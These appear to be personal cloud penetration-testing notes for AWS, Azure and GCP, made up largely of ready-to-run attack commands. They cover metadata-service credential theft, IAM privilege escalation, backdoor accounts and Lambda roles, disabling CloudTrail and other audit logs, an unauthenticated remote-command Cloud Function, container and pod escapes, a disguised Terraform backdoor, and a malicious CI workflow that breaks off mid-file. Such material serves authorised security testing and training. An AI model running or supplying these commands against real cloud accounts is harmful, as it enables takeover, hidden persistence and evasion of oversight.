Cloud Pentesting & Red Teaming Notes

AWS

Initial Access & Reconnaissance

IAM Login Methods & Configuration

Console Access:

  • IAM Login: https://console.aws.amazon.com/
  • SSO Login: https://<org-name>.awsapps.com/start

Programmatic Access (CLI):

# Configure a new CLI profile
aws configure --profile <profile-name>
# You'll be prompted for:
# AWS Access Key ID: [Your Access Key]
# AWS Secret Access Key: [Your Secret Key]
# Default region: [e.g., us-east-1]
# Default output format: [json/text/table]

# Verify configuration and identity
aws sts get-caller-identity --profile <profile-name>
# Returns: Account ID, ARN, and User ID
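
A successful call returns JSON shaped like the following (values here are illustrative):

{
    "UserId": "AIDAEXAMPLE123456789",
    "Account": "123456789012",
    "Arn": "arn:aws:iam::123456789012:user/example-user"
}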

Credential Storage Locations:

  • Windows: C:\Users\UserName\.aws\
  • Linux/macOS: ~/.aws/
  • Files: credentials (keys), config (profiles/regions)
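
For reference, the credentials file is plain INI; a profile entry looks roughly like this (the key values are placeholders, and aws_session_token only appears for temporary credentials):

[profile-name]
aws_access_key_id = AKIAEXAMPLEKEYID
aws_secret_access_key = exampleSecretKeyValue
aws_session_token = exampleSessionTokenValue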

Core Enumeration Strategy

Step 1: Identity Verification

# Always start with this - crucial for understanding your current context
aws sts get-caller-identity --profile <profile-name>

Step 2: IAM Enumeration (Foundation for all attacks)

Users:

# List all users in the account
aws iam list-users --profile <profile-name>

# Get specific user details
aws iam get-user --user-name <user-name> --profile <profile-name>

# Enumerate user's group memberships
aws iam list-groups-for-user --user-name <user-name> --profile <profile-name>

# List policies attached to user (managed policies)
aws iam list-attached-user-policies --user-name <user-name> --profile <profile-name>

# List inline policies for user
aws iam list-user-policies --user-name <user-name> --profile <profile-name>

Groups:

# List all groups
aws iam list-groups --profile <profile-name>

# Get group details and members
aws iam get-group --group-name <group-name> --profile <profile-name>

# List policies attached to group
aws iam list-attached-group-policies --group-name <group-name> --profile <profile-name>
aws iam list-group-policies --group-name <group-name> --profile <profile-name>

Roles (Critical for privilege escalation):

# List all roles - look for assume role opportunities
aws iam list-roles --profile <profile-name>

# Get role trust policy (who can assume this role)
aws iam get-role --role-name <role-name> --profile <profile-name>

# List policies attached to role
aws iam list-attached-role-policies --role-name <role-name> --profile <profile-name>
aws iam list-role-policies --role-name <role-name> --profile <profile-name>

Policy Analysis:

# List all managed policies
aws iam list-policies --profile <profile-name>

# Get policy document (use the DefaultVersionId reported by get-policy; often, but not always, 'v1')
aws iam get-policy --policy-arn <policy-arn> --profile <profile-name>
aws iam get-policy-version --policy-arn <policy-arn> --version-id <version-id> --profile <profile-name>

# Get inline policy documents
aws iam get-user-policy --user-name <user-name> --policy-name <policy-name> --profile <profile-name>
aws iam get-group-policy --group-name <group-name> --policy-name <policy-name> --profile <profile-name>
aws iam get-role-policy --role-name <role-name> --policy-name <policy-name> --profile <profile-name>
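
To cut straight to what a managed policy allows, a JMESPath query helps; a minimal sketch, assuming you substitute the DefaultVersionId from get-policy:

# Print only the statements of the default policy version
aws iam get-policy-version --policy-arn <policy-arn> --version-id <default-version-id> \
  --query 'PolicyVersion.Document.Statement' --output json --profile <profile-name>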

EC2 Instance Metadata Service (IMDS) Exploitation

Context: When you compromise a web application running on EC2, you can often access the instance metadata service to retrieve temporary credentials.
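
In practice the requests below are usually issued through the SSRF vector rather than from a local shell. A hypothetical example, assuming the target app has a vulnerable url fetch parameter:

# Hypothetical SSRF reaching IMDS via the app's fetch parameter
curl "https://vulnerable-app.example/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"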

IMDSv1 (Legacy - No authentication required):

# First, list available roles
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Then retrieve credentials for the role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

IMDSv2 (token required; harder to abuse, but still reachable via SSRF primitives that can issue PUT requests and set custom headers):

# Step 1: Get session token (requires PUT request)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

# Step 2: Use token to access metadata
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Step 3: Get credentials
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

Configure Retrieved Credentials:

# Set up temporary credentials (note the session token requirement)
aws configure set aws_access_key_id <AccessKeyId> --profile ec2-role
aws configure set aws_secret_access_key <SecretAccessKey> --profile ec2-role
aws configure set aws_session_token <Token> --profile ec2-role
aws configure set region <region> --profile ec2-role

# Validate the credentials
aws sts get-caller-identity --profile ec2-role
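
A sketch that wires the fetch and configure steps together, assuming jq is available; the field names (AccessKeyId, SecretAccessKey, Token) match the IMDS credential response shown above:

# Fetch the credential JSON once, then export it as environment variables
CREDS=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>)
export AWS_ACCESS_KEY_ID=$(echo "$CREDS" | jq -r .AccessKeyId)
export AWS_SECRET_ACCESS_KEY=$(echo "$CREDS" | jq -r .SecretAccessKey)
export AWS_SESSION_TOKEN=$(echo "$CREDS" | jq -r .Token)
aws sts get-caller-identity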

Service Enumeration

EC2 (Virtual Machines):

# List instances in the profile's default region (EC2 calls are region-scoped;
# see the region sweep below)
aws ec2 describe-instances --profile <profile-name>

# Get instances in specific region
aws ec2 describe-instances --region <region> --profile <profile-name>

# List security groups (firewall rules)
aws ec2 describe-security-groups --profile <profile-name>

# List key pairs
aws ec2 describe-key-pairs --profile <profile-name>
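
Because EC2 calls are region-scoped, a simple loop covers the whole account; a minimal sketch:

# Sweep every enabled region for instances
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' \
    --output text --profile <profile-name>); do
  echo "== $region =="
  aws ec2 describe-instances --region "$region" \
    --query 'Reservations[].Instances[].[InstanceId,State.Name,PublicIpAddress]' \
    --output table --profile <profile-name>
done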

S3 (Storage):

# List all buckets
aws s3 ls --profile <profile-name>

# List bucket contents
aws s3 ls s3://<bucket-name> --profile <profile-name>

# Get bucket policy
aws s3api get-bucket-policy --bucket <bucket-name> --profile <profile-name>

# Check for public access
aws s3api get-public-access-block --bucket <bucket-name> --profile <profile-name>

RDS (Databases):

# List RDS instances
aws rds describe-db-instances --profile <profile-name>

# List RDS snapshots
aws rds describe-db-snapshots --profile <profile-name>

Privilege Escalation Techniques

1. Policy Attachment Escalation:

# If you have iam:AttachRolePolicy or iam:AttachUserPolicy
# Attach administrative policy to current role/user
aws iam attach-role-policy \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess \
  --role-name <current-role-name> --profile <profile-name>

# Verify escalation
aws iam list-attached-role-policies --role-name <role-name> --profile <profile-name>

2. Policy Version Manipulation:

# If you have iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion
# Get current policy
aws iam get-policy-version --policy-arn <policy-arn> --version-id v1 \
  --query 'PolicyVersion.Document' --profile <profile-name>

# Create malicious policy version (modify JSON to add permissions)
aws iam create-policy-version --policy-arn <policy-arn> \
  --policy-document file://malicious-policy.json --set-as-default \
  --profile <profile-name>
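
An example of what malicious-policy.json might contain; this is the standard full-admin statement (in practice you would append it to the legitimate document so the change is less obvious):

# Example malicious-policy.json granting full admin
cat > malicious-policy.json << 'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": "*", "Resource": "*"}
  ]
}
EOF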

3. Role Assumption Chain:

# If you can assume roles, check trust policies for privilege escalation
aws sts assume-role --role-arn <target-role-arn> \
  --role-session-name <session-name> --profile <profile-name>

# Configure assumed role credentials
aws configure set aws_access_key_id <AccessKeyId> --profile assumed-role
aws configure set aws_secret_access_key <SecretAccessKey> --profile assumed-role
aws configure set aws_session_token <SessionToken> --profile assumed-role
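
The manual copy-paste can be skipped with a --query one-liner; a sketch:

# Print just the three values needed for the assumed-role profile
aws sts assume-role --role-arn <target-role-arn> \
  --role-session-name <session-name> --profile <profile-name> \
  --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]' --output text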

Automated Reconnaissance Tools

Pacu (Comprehensive AWS Exploitation Framework):

# Installation
pip3 install pacu
# OR
git clone https://github.com/RhinoSecurityLabs/pacu.git
cd pacu && bash install.sh

# Usage
pacu
(Pacu) > new_session <session-name>
(Pacu) > set_keys  # Configure AWS credentials
(Pacu) > whoami    # Verify current identity

# Set target region(s) for efficiency
(Pacu) > set_regions us-east-1,us-west-2

# Key modules for reconnaissance:
(Pacu) > run iam__enum_permissions  # Map current permissions
(Pacu) > run iam__enum_users_roles_policies_groups  # Full IAM enumeration
(Pacu) > run ec2__enum  # EC2 enumeration
(Pacu) > run s3__bucket_finder  # Find S3 buckets

# Privilege escalation scanning and exploitation
(Pacu) > run iam__privesc_scan  # Identify privilege escalation paths
(Pacu) > run iam__backdoor_users_keys  # Create persistence mechanisms

# Advanced reconnaissance
(Pacu) > run recon__find_admins  # Identify administrative users
(Pacu) > run detection__disruption  # Disrupt monitoring (GuardDuty, CloudTrail, etc.)

Prowler (AWS Security Assessment):

# Installation
git clone https://github.com/prowler-cloud/prowler
cd prowler
pip install -r requirements.txt

# Usage with AWS credentials
export AWS_PROFILE=<profile-name>
./prowler aws

# Specific compliance checks
./prowler aws --compliance cis_1.5_aws  # CIS benchmark
./prowler aws --compliance gdpr  # GDPR compliance

# Focus on specific services
./prowler aws --services s3,iam,ec2

# Generate reports
./prowler aws --output-formats json,html --output-directory ./reports/

CloudFox (Attack Path Identification):

# Download from https://github.com/BishopFox/cloudfox/releases
chmod +x cloudfox

# Full reconnaissance
./cloudfox aws --profile <profile-name> all-checks

# Specific modules
./cloudfox aws --profile <profile-name> principals  # IAM analysis
./cloudfox aws --profile <profile-name> permissions  # Permission mapping
./cloudfox aws --profile <profile-name> instances    # EC2 analysis
./cloudfox aws --profile <profile-name> buckets      # S3 analysis

# Generate attack paths
./cloudfox aws --profile <profile-name> graph

Persistence Mechanisms

1. IAM User Creation:

# If you have iam:CreateUser, iam:CreateAccessKey, iam:AttachUserPolicy
aws iam create-user --user-name backdoor-user --profile <profile-name>
aws iam create-access-key --user-name backdoor-user --profile <profile-name>
aws iam attach-user-policy --user-name backdoor-user \
  --policy-arn arn:aws:iam::aws:policy/PowerUserAccess --profile <profile-name>

2. Lambda Backdoor:

# Create persistent Lambda function for remote access
# First, create trust policy for Lambda
cat > lambda-trust-policy.json << EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {"Service": "lambda.amazonaws.com"},
      "Action": "sts:AssumeRole"
    }
  ]
}
EOF

# Create role for Lambda
aws iam create-role --role-name lambda-backdoor-role \
  --assume-role-policy-document file://lambda-trust-policy.json \
  --profile <profile-name>

# Attach policy to role
aws iam attach-role-policy --role-name lambda-backdoor-role \
  --policy-arn arn:aws:iam::aws:policy/PowerUserAccess \
  --profile <profile-name>
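
The role is only half of the backdoor; a sketch of deploying the function itself (the handler code and function.zip are assumptions, not shown above):

# Deploy a function that executes as the backdoor role
aws lambda create-function --function-name maintenance-task \
  --runtime python3.9 --handler lambda_function.lambda_handler \
  --role arn:aws:iam::<account-id>:role/lambda-backdoor-role \
  --zip-file fileb://function.zip --profile <profile-name>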

3. CloudTrail Manipulation:

# Disable logging to hide tracks (if you have cloudtrail:StopLogging)
aws cloudtrail stop-logging --name <trail-name> --profile <profile-name>

# Stage a log group for a log-cleanup Lambda (the function itself is not shown)
aws logs create-log-group --log-group-name /aws/lambda/log-cleaner \
  --profile <profile-name>

Azure

Initial Access & Reconnaissance

Authentication Methods & Endpoints

Portal URLs:

  • Azure Portal: https://portal.azure.com/
  • M365 Admin: https://admin.microsoft.com
  • M365 User Portal: https://office.com/

API Endpoints:

  • Microsoft Graph: https://graph.microsoft.com/v1.0/ (Identity, M365)
  • Azure Resource Manager: https://management.azure.com/ (Azure resources)

Authentication Tools:

Azure CLI:

# Interactive login
az login

# Service Principal login
az login --service-principal \
  --username <application-id> \
  --password <client-secret> \
  --tenant <tenant-id>

# Verify authentication
az account show
az account list --all

Azure PowerShell:

# Interactive login
Connect-AzAccount

# Service Principal login
$cred = Get-Credential  # Enter Application ID as username, Client Secret as password
Connect-AzAccount -ServicePrincipal -Tenant <tenant-id> -Credential $cred

# Verify authentication
Get-AzContext
Get-AzSubscription

Microsoft Graph PowerShell:

# Install module (if needed)
Install-Module Microsoft.Graph -Force

# Connect with specific scopes
Connect-MgGraph -Scopes "Directory.Read.All", "User.Read.All", "Application.Read.All"

# Verify connection
Get-MgContext

Token-Based Authentication (Post-Compromise)

Retrieving and Using Access Tokens:

# Get ARM token
az account get-access-token --resource https://management.azure.com/

# Get Graph token
az account get-access-token --resource https://graph.microsoft.com/

# Use token with PowerShell
$token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs..."
Connect-AzAccount -AccessToken $token -AccountId <user-upn-or-app-id>
# Use Graph token
$graphToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs..."
$secureToken = ConvertTo-SecureString -String $graphToken -AsPlainText -Force
Connect-MgGraph -AccessToken $secureToken

Entra ID (Azure AD) Enumeration

Identity Provider Detection:

# Check if the organization uses Entra ID (NameSpaceType: Managed, Federated, or Unknown)
curl "https://login.microsoftonline.com/getuserrealm.srf?login=user@domain.com&xml=1"

User Enumeration:

# List all users
Get-MgUser -All

# Get specific user details
Get-MgUser -UserId <user-id> | ConvertTo-Json

# Get user's group memberships
Get-MgUserMemberOf -UserId <user-id>

# Get user's transitive group memberships
Get-MgUserTransitiveMemberOf -UserId <user-id>

# Get user's owned objects
Get-MgUserOwnedObject -UserId <user-id>

Group Analysis:

# List all groups
Get-MgGroup -All

# Get group members
Get-MgGroupMember -GroupId <group-id>

# List directory roles that look administrative (these are roles, not groups)
Get-MgDirectoryRole | Where-Object {$_.DisplayName -like "*Admin*"}

Application & Service Principal Enumeration:

# List application registrations
Get-MgApplication -All

# Get app details with sensitive permissions
Get-MgApplication -ApplicationId <app-id> | Select-Object DisplayName, RequiredResourceAccess

# List service principals
Get-MgServicePrincipal -All

# Get service principal permissions
Get-MgServicePrincipal -ServicePrincipalId <sp-id> | Select-Object AppRoles, Oauth2PermissionScopes

# Get application owners (privilege escalation target)
Get-MgApplicationOwner -ApplicationId <app-id>

Directory Role Analysis:

# List all directory roles
Get-MgDirectoryRole

# Get members of privileged roles
$globalAdminRole = Get-MgDirectoryRole -Filter "DisplayName eq 'Global Administrator'"
Get-MgDirectoryRoleMember -DirectoryRoleId $globalAdminRole.Id

Azure Resource Manager Enumeration

Subscription Discovery:

# List accessible subscriptions
az account list --all --output table

# Set active subscription
az account set --subscription <subscription-id>

Resource Enumeration:

# List all resource groups
az group list --output table

# List all resources
az resource list --output table

# List VMs with public IPs
az vm list-ip-addresses --output table

# List storage accounts
az storage account list --output table

# List key vaults
az keyvault list --output table

RBAC Analysis:

# List role assignments for current user
az role assignment list --assignee <user-object-id> --all

# List all role assignments in subscription
az role assignment list --all --output table

# List custom roles
az role definition list --custom-role-only --output table

# Get role definition details
az role definition list --name "Contributor"

Azure VM Metadata Service Exploitation

Retrieving Managed Identity Tokens:

# Get ARM token from VM metadata service
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

# Get Graph token
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"

# Get Key Vault token
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net/"

Using Retrieved Tokens:

# Extract access token from response
$response = Invoke-RestMethod -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -Headers @{Metadata="true"}
$token = $response.access_token

# Use token with Az PowerShell
Connect-AzAccount -AccessToken $token -AccountId <managed-identity-client-id>

Privilege Escalation Techniques

1. Application Owner to Global Admin:

# If you own an application, add credentials to it
Add-MgApplicationPassword -ApplicationId <app-object-id>

# If the app's service principal has high privileges, you now control it

2. Directory Role Assignment:

# If you have privilege to assign directory roles
New-MgDirectoryRoleMemberByRef -DirectoryRoleId <role-id> -BodyParameter @{
    "@odata.id" = "https://graph.microsoft.com/v1.0/users/<user-id>"
}

3. Azure Resource Manager Privilege Escalation:

# If you have User Access Administrator role
az role assignment create \
  --assignee <user-object-id> \
  --role "Owner" \
  --scope "/subscriptions/<subscription-id>"

4. Application Permission Escalation:

# If you have Application.ReadWrite.All
# Create new application with high privileges
$app = New-MgApplication -DisplayName "EvilApp" -RequiredResourceAccess @(
    @{
        ResourceAppId = "00000003-0000-0000-c000-000000000000"  # Microsoft Graph
        ResourceAccess = @(
            @{
                Id = "19dbc75e-c2e2-444c-a770-ec69d8559fc7"  # Directory.ReadWrite.All
                Type = "Role"
            }
        )
    }
)

# Create service principal
New-MgServicePrincipal -AppId $app.AppId
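
Requesting the app role is not enough on its own; it still has to be granted to the service principal. A sketch over the Graph REST API, assuming you hold rights to grant app roles ($TOKEN, the two object IDs, and the Directory.ReadWrite.All role ID from above are assumptions for illustration):

# Grant the requested app role to the new service principal
curl -X POST "https://graph.microsoft.com/v1.0/servicePrincipals/<sp-object-id>/appRoleAssignments" \
  -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
  -d '{"principalId": "<sp-object-id>", "resourceId": "<graph-sp-object-id>", "appRoleId": "19dbc75e-c2e2-444c-a770-ec69d8559fc7"}'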

Automated Tools

AzureHound (BloodHound for Azure):

# Installation - AzureHound is a compiled Go binary, not a pip package;
# download a release from https://github.com/BloodHoundAD/AzureHound/releases
chmod +x azurehound

# Collection with username/password
./azurehound list -u <username> -p <password> -t <tenant-id>

# Write BloodHound-compatible JSON to a file
./azurehound list -u <username> -p <password> -t <tenant-id> -o <output-file>

PowerZure (Azure PowerShell Exploitation):

# Installation
Install-Module -Name PowerZure -Force

# Import and authenticate
Import-Module PowerZure
Connect-AzAccount

# Reconnaissance
Get-AzureTargets  # Find interesting resources
Get-AzureRoleMembers  # Find privileged users

MicroBurst (Azure Security Assessment):

# Installation
git clone https://github.com/NetSPI/MicroBurst.git
Import-Module .\MicroBurst.psm1

# Subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base <company-name>

# Blob enumeration
Invoke-EnumerateAzureBlobs -Base <company-name>

GCP

Initial Access & Reconnaissance

Authentication Methods

gcloud CLI Authentication:

# User account login
gcloud auth login

# Service account login
gcloud auth activate-service-account --key-file <service-account-key.json>

# Verify authentication
gcloud auth list
gcloud config list

Credential Storage:

  • Windows: %APPDATA%\gcloud\
  • Linux/macOS: ~/.config/gcloud/
  • Key Files:
    • access_tokens.db: Contains access tokens and expiry info
    • credentials.db: Contains account credentials

Project and Organization Discovery

Organization Enumeration:

# List accessible organizations
gcloud organizations list

# Get organization IAM policy
gcloud organizations get-iam-policy <org-id>

Project Enumeration:

# List all accessible projects
gcloud projects list

# Get project IAM policy
gcloud projects get-iam-policy <project-id>

# Set active project
gcloud config set project <project-id>

IAM Enumeration Strategy

Service Account Analysis:

# List service accounts in project
gcloud iam service-accounts list

# Get service account IAM policy
gcloud iam service-accounts get-iam-policy <service-account-email>

# List service account keys
gcloud iam service-accounts keys list --iam-account <service-account-email>

# Generate new service account key (if you have permission)
gcloud iam service-accounts keys create key.json --iam-account <service-account-email>
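
The new key can then be used to authenticate as that account:

# Authenticate with the freshly created key
gcloud auth activate-service-account --key-file key.json
gcloud auth list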

Role Analysis:

# List all predefined roles
gcloud iam roles list --filter="stage:GA" --format="table(name,title)"

# List custom roles for project
gcloud iam roles list --project <project-id>

# Describe specific role
gcloud iam roles describe roles/owner
gcloud iam roles describe <custom-role-id> --project <project-id>

Policy Analysis:

# Get IAM policy for project
gcloud projects get-iam-policy <project-id>

# Filter roles for specific member
gcloud projects get-iam-policy <project-id> \
  --flatten="bindings[].members" \
  --filter="bindings.members:serviceAccount:<email>" \
  --format="value(bindings.role)"

GCP Metadata Service Exploitation

Retrieving Access Tokens:

# Get default service account token
curl -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"

# Get specific service account token
curl -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/<email>/token"

# Get available service accounts
curl -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/"

# Get project metadata
curl -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/project/project-id"

Using Retrieved Tokens:

# Save token for use
echo "ya29.c.Kp8BCAi..." > token.txt

# Use the raw bearer token with gcloud (activate-service-account expects a
# JSON key file, not an access token, so it does not work here)
gcloud projects list --access-token-file token.txt

# OR call the REST APIs directly
curl -H "Authorization: Bearer $(cat token.txt)" \
  "https://cloudresourcemanager.googleapis.com/v1/projects"

Service Enumeration

Compute Engine:

# List compute instances
gcloud compute instances list

# List instance groups
gcloud compute instance-groups list

# List firewalls
gcloud compute firewall-rules list

# List networks
gcloud compute networks list

Cloud Storage:

# List storage buckets
gcloud storage ls

# List bucket contents
gcloud storage ls gs://<bucket-name>

# Get bucket IAM policy
gcloud storage buckets get-iam-policy gs://<bucket-name>

# Check for publicly accessible buckets
gsutil iam get gs://<bucket-name>

Cloud SQL:

# List SQL instances
gcloud sql instances list

# Get SQL instance details
gcloud sql instances describe <instance-name>

# List databases
gcloud sql databases list --instance <instance-name>

BigQuery:

# List datasets
bq ls

# List tables in dataset
bq ls <dataset-id>

# Query table (if accessible)
bq query --use_legacy_sql=false 'SELECT * FROM `project.dataset.table` LIMIT 10'

Privilege Escalation Techniques

Common High-Risk Permissions:

  • iam.serviceAccounts.actAs - Impersonate service accounts
  • iam.serviceAccountKeys.create - Create new service account keys (see the sketch after this list)
  • compute.instances.setMetadata - Modify instance metadata
  • deploymentmanager.deployments.create - Create deployment manager templates
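
A sketch of the second permission above: minting a key for a higher-privileged service account and pivoting to it:

# Abuse iam.serviceAccountKeys.create to become a more privileged account
gcloud iam service-accounts keys create escalated-key.json \
  --iam-account <high-privilege-sa-email>
gcloud auth activate-service-account --key-file escalated-key.json
gcloud projects get-iam-policy <project-id>   # confirm the new blast radius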

Service Account Impersonation:

# Direct impersonation requires iam.serviceAccounts.getAccessToken
# (Service Account Token Creator) on the target account
gcloud compute instances list --impersonate-service-account <target-service-account>

# iam.serviceAccounts.actAs does not grant impersonation by itself; it lets
# you attach the target account to new resources (VMs, functions,
# deployments) that then run with its identity

Deployment Manager Exploitation:

# Create malicious deployment template
cat > evil-deployment.yaml << EOF
resources:
- name: evil-vm
  type: compute.v1.instance
  properties:
    zone: us-central1-a
    machineType: zones/us-central1-a/machineTypes/n1-standard-1
    serviceAccounts:
    - email: <high-privilege-service-account>
      scopes:
      - https://www.googleapis.com/auth/cloud-platform
EOF

# Deploy
gcloud deployment-manager deployments create evil-deployment \
  --config evil-deployment.yaml

Automated Tools

CloudFox GCP Module:

# Download CloudFox
wget https://github.com/BishopFox/cloudfox/releases/latest/download/cloudfox-linux-amd64
chmod +x cloudfox-linux-amd64

# Run full assessment
./cloudfox-linux-amd64 gcp --project <project-id> all-checks

# Specific modules
./cloudfox-linux-amd64 gcp --project <project-id> iam
./cloudfox-linux-amd64 gcp --project <project-id> compute
./cloudfox-linux-amd64 gcp --project <project-id> storage

GCP IAM Privilege Escalation Scanner:

# Installation
git clone https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation.git
cd GCP-IAM-Privilege-Escalation
pip3 install -r requirements.txt

# Enumerate permissions
python3 enumerate_member_permissions.py -p <project-id>

# Check for privilege escalation paths
python3 check_for_privesc.py -p <project-id>

# Exploit specific vulnerabilities (example)
python3 ExploitScripts/iam.serviceAccounts.implicitDelegation.py -p <project-id>

GCPBucketBrute (Storage Enumeration):

# Installation
git clone https://github.com/RhinoSecurityLabs/GCPBucketBrute.git
cd GCPBucketBrute

# Enumerate buckets
python3 gcpbucketbrute.py -k <keywords-file> -w <wordlist>

General Cloud Security Considerations

Multi-Cloud Attack Chains

Cross-Cloud Credential Reuse:

  • Check for AWS credentials in Azure Key Vault
  • Look for GCP service account keys in AWS S3
  • Search for cloud credentials in GitHub/GitLab repos

Federated Identity Exploitation:

  • SAML assertion manipulation
  • OAuth token hijacking
  • OIDC misconfiguration abuse

Detection Evasion

Log Manipulation:

# AWS - Disable CloudTrail
aws cloudtrail stop-logging --name <trail-name>

# Azure - Disable diagnostic settings
az monitor diagnostic-settings delete --name <setting-name> --resource <resource-id>

# GCP - Disable audit logging
gcloud logging sinks delete <sink-name>

Traffic Routing:

  • Use VPC endpoints to avoid internet traffic
  • Leverage cloud NAT gateways
  • Utilize cloud proxy services

Persistence Mechanisms

Cross-Cloud Persistence:

  1. Federated SSO Backdoors: Modify SAML configurations
  2. Cross-Account Roles: Create roles that can be assumed from other clouds
  3. Automation Backdoors: Lambda/Functions/Cloud Run with scheduled triggers (see the EventBridge sketch after this list)
  4. Storage-Based Persistence: Hide credentials in object storage
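
A sketch of item 3 on AWS, assuming a backdoor Lambda already exists (the rule name and ARN placeholders are assumptions):

# Re-trigger a backdoor Lambda on a schedule via EventBridge
aws events put-rule --name maintenance-check --schedule-expression "rate(12 hours)"
aws events put-targets --rule maintenance-check \
  --targets "Id"="1","Arn"="arn:aws:lambda:<region>:<account-id>:function:<function-name>"
aws lambda add-permission --function-name <function-name> \
  --statement-id events-invoke --action lambda:InvokeFunction \
  --principal events.amazonaws.com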

Common Misconfigurations

Identity and Access Management:

  • Overprivileged service accounts
  • Wildcard principals in trust policies
  • Missing MFA requirements
  • Excessive API permissions

Network Security:

  • Open security groups (0.0.0.0/0 access; see the quick check after this list)
  • Missing network segmentation
  • Unrestricted outbound access
  • Public database endpoints
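
A quick check for the first item above on AWS, using a standard describe-security-groups filter:

# Find security groups with rules open to the world
aws ec2 describe-security-groups \
  --filters Name=ip-permission.cidr,Values=0.0.0.0/0 \
  --query 'SecurityGroups[].[GroupId,GroupName]' --output table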

Data Protection:

  • Unencrypted storage buckets
  • Public snapshots/backups
  • Misconfigured access policies
  • Missing data classification

Advanced Persistence Techniques

AWS Lambda Layers:

# Create malicious layer
zip -r layer.zip python/
aws lambda publish-layer-version --layer-name backdoor-layer \
  --zip-file fileb://layer.zip --compatible-runtimes python3.9

# Attach to existing functions
aws lambda update-function-configuration --function-name <target-function> \
  --layers arn:aws:lambda:region:account:layer:backdoor-layer:1

Azure Automation Runbooks:

# Create persistent runbook
$runbookContent = @"
# Connect using Managed Identity
Connect-AzAccount -Identity
# Your malicious code here
"@

# PowerShell continues lines with a backtick, not a backslash, and
# Import-AzAutomationRunbook reads the runbook body from a file via -Path
$runbookContent | Out-File -FilePath .\MaintenanceScript.ps1

New-AzAutomationRunbook -AutomationAccountName <account> -ResourceGroupName <rg> `
  -Name "MaintenanceScript" -Type PowerShell -Description "System maintenance"

Import-AzAutomationRunbook -AutomationAccountName <account> -ResourceGroupName <rg> `
  -Path .\MaintenanceScript.ps1 -Type PowerShell -Force

GCP Cloud Functions:

# Create persistent function
cat > main.py << EOF
import functions_framework
import subprocess

@functions_framework.http
def backdoor(request):
    cmd = request.args.get('cmd', 'whoami')
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout
EOF

# Deploy function
gcloud functions deploy backdoor --runtime python39 --trigger-http \
  --allow-unauthenticated --source .

Container Security

Container Escape Techniques:

# Check for privileged containers
docker inspect <container-id> | grep -i privileged

# Mount host filesystem
docker run -v /:/host -it ubuntu:latest chroot /host /bin/bash

# Exploit Docker socket
docker run -v /var/run/docker.sock:/var/run/docker.sock -it docker:latest
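
With the socket mounted, the inner Docker client drives the host daemon, so the filesystem mount from the previous example can be replayed from inside the container; a sketch:

# From inside the socket-mounted container: start a new privileged
# container on the host and chroot into the host filesystem
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu:latest chroot /host /bin/bash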

Kubernetes Exploitation:

# Check service account permissions
kubectl auth can-i --list

# Pod escape via hostPath
kubectl run escape-pod --image=ubuntu:latest --overrides='
{
  "spec": {
    "hostPID": true,
    "hostNetwork": true,
    "containers": [{
      "name": "escape",
      "image": "ubuntu:latest",
      "command": ["/bin/bash"],
      "stdin": true,
      "tty": true,
      "securityContext": {
        "privileged": true
      },
      "volumeMounts": [{
        "mountPath": "/host",
        "name": "host-root"
      }]
    }],
    "volumes": [{
      "name": "host-root",
      "hostPath": {
        "path": "/"
      }
    }]
  }
}'

# Execute into escaped pod
kubectl exec -it escape-pod -- /bin/bash
chroot /host /bin/bash

Supply Chain Attacks

Terraform/IaC Poisoning:

# Malicious Terraform module
resource "aws_iam_user" "backdoor" {
  name = "system-backup-user"
  tags = {
    Purpose = "Automated backups"
  }
}

resource "aws_iam_access_key" "backdoor_key" {
  user = aws_iam_user.backdoor.name
}

resource "aws_iam_user_policy_attachment" "backdoor_policy" {
  user       = aws_iam_user.backdoor.name
  policy_arn = "arn:aws:iam::aws:policy/PowerUserAccess"
}

# Exfiltrate credentials via outputs - the provider marks `secret` as
# sensitive, so Terraform requires `sensitive = true`; read it back with
# `terraform output -raw backup_secret_key`
output "backup_access_key" {
  value = aws_iam_access_key.backdoor_key.id
}

output "backup_secret_key" {
  value     = aws_iam_access_key.backdoor_key.secret
  sensitive = true
}

CI/CD Pipeline Exploitation:

# Malicious GitHub Actions workflow
name: Security Scan
on:
  push:
    branches: [ main ]

jobs:
  security-scan:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    
    - name: Configure AWS credentials
      uses: aws-actions/configure-aws-credentials@v1
      with:
        aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
